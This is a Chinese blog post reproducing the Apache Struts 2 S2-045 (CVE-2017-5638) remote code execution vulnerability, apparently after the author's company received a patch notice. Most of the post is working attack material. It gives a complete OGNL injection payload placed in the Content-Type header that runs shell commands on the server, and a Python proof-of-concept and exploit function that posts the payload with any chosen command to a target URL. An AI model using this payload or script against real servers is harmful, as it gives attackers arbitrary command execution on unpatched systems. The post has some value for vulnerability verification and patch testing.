S2-045 Struts 2漏洞(CVE-2017-5638) 实战

已于 2022-08-11 14:10:56 修改
阅读量796 收藏
点赞数
分类专栏: 安全 文章标签: struts 后端
于 2022-08-11 09:26:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shylcok/article/details/126278385
版权

背景:

公司接到阿里云需要升级Struts 2的邮件,因为 我们公司用的 Struts 2版本 有远程代码执行漏洞

根据网上描述,进行复现:

1.抓包,使用bp或者Charles都行 (我这使用Charles)

重要的是,下图中 Content-Type的内容 进行修改

 原来请求后得到的结果是:

2.改包(1.打断点2.repeat一下3修改需要修改的)

 上面的文字是:

"Content-Type": "%{(#xxx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"ls"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

 当中的重点就是加粗字体:(#cmd='"ls"')

可以执行一些命令

但是 如果执行一些和文件,目录相关的操作 就会提示: 没有那个文件或目录

such as:(#cmd='"/bin/cd /"')

如果cd前面不加bin这个路径 会提示找不到cd这个命令。

现在可以执行查看路径等一些权限,但是还做不到删除,新增等一些操作。

按道理来说是行的, 继续研究

----------后续-------

又找了个payload的content-type可以执行

payloadPrefix="hah-multipart/form-data %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"

payloadSuffix="').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

def poc(url):
    headers ={ "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36",
    "Connection":"close",
    "Content-Type":"hah-multipart/form-data %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmdLinux='echo \\'******[ Linux ]******PocFlagString-3268e6d1cdc1c4b2c9c480907a3f1711-gnirtSgalFcoP\\' && uname -a && whoami').(#cmdWin='echo \\'******[ Windows ]******PocFlagString-3268e6d1cdc1c4b2c9c480907a3f1711-gnirtSgalFcoP\\' && whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmdWin}:{'/bin/bash','-c',#cmdLinux})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    }
    result = requests.post(url, headers=headers)
    return(result.text)

def exp(url,cmd):
    global payloadPrefix
    global payloadSuffix
    headers ={ "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36",
    "Connection":"close",
    "Content-Type":str(payloadPrefix)+str(cmd)+str(payloadSuffix)
    }
    result = requests.post(url, headers=headers)
    return(result.text)

shylcok
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
S2-045漏洞之简单分析+实战
BlingSmile的博客
04-12 1万+
0X00 前言:尽管s2-045的poc已经烂大街了,博主只是想学习了解一下它的用法,顺带写了一个测试小工具。0x01 漏洞简介Apache Struts是一套用于创建企业级Java Web 应用的开源MVC框架 。 Apache Struts 2.3.5 – 2.3.31版本及2.5 – 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)。该漏
Apache_Struts2漏洞(S2-045,CVE-2017-5638)
01-20
CVE-2017-5638 是S2-045漏洞的官方CVE编号,这表明了它是一个被广泛认可的安全漏洞。当Struts2尝试解析非标准的MIME类型时,比如“multipart/form-data; boundary=----WebKitFormBoundary”这类格式,如果没有正确...
Struts2 S2-045 远程代码执行漏洞CVE-2017-5638)
qq_68163788的博客
06-24 524
Struts2是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet当基于Jakarta插件上传文件时,可导致远程代码执行。
struts2 CVE-2020-17530漏洞复现
Armandhe的博客
06-08 785
我丝毫不敢休息,又肝了一篇
Struts2_053_RCE CVE-2017-12611 漏洞复现
ADummy的博客
02-19 626
Struts2_053_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行 0x01漏洞介绍 ​ Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 ​ 影响版本 2.0.1 - 2.3.33 2.5 - 2.5.10
Struts2_007_RCE CVE-2012-0838 漏洞复现
ADummy的博客
02-18 667
Struts2_007_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行 0x01漏洞介绍 ​ 当<ActionName> -validation.xml配置的验证规则。如果类型验证转换失败,则服务器将拼接用户提交的表单值字符串,然后执行OGNL表达式解析并返回,造成OGNL表达式注入。从而可能造成远程执行代码。 ​ 当用户age以str而不是的形式提交时int,服务器将拼接"'" + valu
Struts2_012_RCE CVE-2012-0391 漏洞复现
ADummy的博客
02-18 795
Struts2_012_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class=
Struts2_008_RCE CVE-2012-0392 漏洞复现
ADummy的博客
02-18 1285
Struts2_008_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行 0x01漏洞介绍 ​ 为了防止攻击者在参数内调用任意方法,默认情况下将标志xwork.MethodAccessor.denyMethodExecution设置为true,并将SecurityMemberAccess字段allowStaticMethodAccess设置为false。另外,为了防止访问上下文变量,自Struts 2.2.1.
Struts2_032_RCE CVE-2016-3081 漏洞复现
ADummy的博客
02-19 975
Struts2_032_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行—>有回显 0x01漏洞介绍 ​ Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑
漏洞复现】6.Struts2 S2-061 远程命令执行漏洞CVE-2020-17530)复现与分析
Zichel77的博客
03-21 1366
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
S2-066漏洞分析与复现(CVE-2023-50164)
蚁景网安学院
03-20 683
struts2官方纰漏S2-066漏洞已经有一段时间,期间断断续续地写,直到最近才完成。回顾一下官方通告:2023.12.9发布,编号CVE-2023-50164,主要影响版本是 2.5.0-2.5.32 以及 6.0.0-6.3.0,描述中提到了文件上传漏洞和目录穿越漏洞
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
S2-045 struts2-core-2.3.32.jar 相关jar包,测试可用
03-09
目前Struts2官方已经确认漏洞漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高危风险。 该漏洞的影响范围:Struts2.3.5 到 Struts2.3.31 以及 Struts2.5 到 Struts2.5.10。 修复方式:更新至Struts 2.3.32...
struts2 漏洞 "cve-2017-5638" 研究文档
11-21
目前Struts2官方已经确认漏洞漏洞编号S2-045,CVE编号:cve-2017-5638),并定级为高风险。 CVE: 英文全称是“Common Vulnerabilities & Exposures”公共漏洞和暴露。CVE就好像是一个字典表,为广泛认同的信息...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
最后,s2-017(CVE-2017-9791)是2017年的另一个反序列化漏洞,它影响了Struts2的StrutsRequestWrapper类。攻击者可以利用这个漏洞,通过发送恶意的HTTP请求,触发系统的反序列化过程,执行任意代码。 为了应对这些...
SpringCloud+Vue3多对多,多表联查
小宋和大家一起在学习和前进的道路上分享、努力
07-27 1133
♥️作者:小宋1021🤵‍♂️:小宋1021主页♥️坚持分析平时学习到的项目以及学习到的知识,和大家一起努力呀!!!🎈🎈加油!加油!加油!加油目的:多表联查数据库:学员表(study_student) 字段:学生姓名(sts_student_name)、手机号(sts_phone)班级管理(teach_class_manage)字段:班级名称(teach_class_manage)、id(id)教师管理(hr_teacher_manage)字段:教师姓名(teacher_name)
web后端--Spring事务管理
最新发布
2301_80113113的博客
07-28 196
事务也要日志配置。
后端采用SpringBoot框架开发的:ADR药物不良反应智能监测系统源码,用于监测和收集药品在使用过程中发生的不良反应的系统
baina666的博客
07-26 455
ADR药物不良反应智能监测系统的优势在于其能够快速、准确地识别潜在的不良反应事件,并及时采取相应的措施,从而减少药害事故的发生,保障公众用药安全。该系统基于医院临床数据中心,运用信息技术实现药品不良反应的智能监测、报告管理、知识库查询、统计分析等功能,旨在提高药品使用的安全性和患者的用药安全。:系统能够自动从各个数据源(如电子病历、实验室信息系统、药房管理系统等)收集相关的患者数据、药品使用信息和不良反应报告,并进行整合和清洗,以确保数据的准确性和一致性。
CVE-2017-5638漏洞利用
10-08
CVE-2017-5638是一个与Apache Struts框架相关的远程代码执行漏洞。该漏洞利用了Apache Struts框架中的一个问题,攻击者可以通过精心构造的恶意输入来执行任意代码,从而实现远程代码执行。 攻击者可以利用该漏洞通过发送恶意的HTTP请求来执行任意代码。当受影响的应用程序使用了受漏洞影响的Apache Struts版本,并且配置了支持动态表达式语言(如OGNL)时,就会存在风险。 为了利用该漏洞,攻击者可以构造一个特制的HTTP请求,其中包含恶意的表达式语言。当服务器接收到该请求并进行解析时,恶意代码将会被执行。 为了防止CVE-2017-5638漏洞的利用,推荐以下措施: 1. 及时更新Apache Struts框架到最新版本,以确保已修复漏洞。 2. 验证和过滤所有输入数据,特别是用户提供的输入。确保输入数据不包含恶意代码。 3. 最小化应用程序和服务器上的攻击面,禁用或移除不必要的功能和服务。 4. 配置网络防火墙或入侵检测系统以监视和检测该漏洞的利用尝试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值